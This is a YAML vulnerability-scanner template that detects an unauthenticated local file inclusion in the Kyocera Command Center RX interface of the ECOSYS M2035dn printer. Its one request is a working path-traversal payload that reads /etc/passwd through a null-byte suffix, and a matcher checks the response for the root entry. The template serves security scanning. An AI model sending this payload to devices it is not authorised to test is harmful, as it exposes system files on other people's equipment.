id: kyocera-m2035dn-lfi

info:
  name: Kyocera Command Center RX ECOSYS M2035dn - Local File Inclusion
  author: 0x_Akoko
  severity: high
  description: Kyocera Command Center RX ECOSYS M2035dn is vulnerable to unauthenticated local file inclusion.
  reference:
    - https://www.exploit-db.com/exploits/50738
    - https://www.kyoceradocumentsolutions.com/asia/en/products/business-application/command-center-rx.html
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  metadata:
    max-request: 1
  tags: edb,printer,iot,kyocera,lfi

http:
  - method: GET
    path:
      - "{{BaseURL}}/js/../../../../../../../../etc/passwd%00.jpg"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0"

      - type: status
        status:
          - 200

# digest: 4a0a0047304502203d4923a68f1bce74bb85a80915835571c83382fc304fc2a0c1bd6c30062875640221008c40d73f3f329e4d3b1eb3a1ab9b94f00a7a0a769e89fc885be02771f359c665:922c64590222798bb761d5b6d8e72950
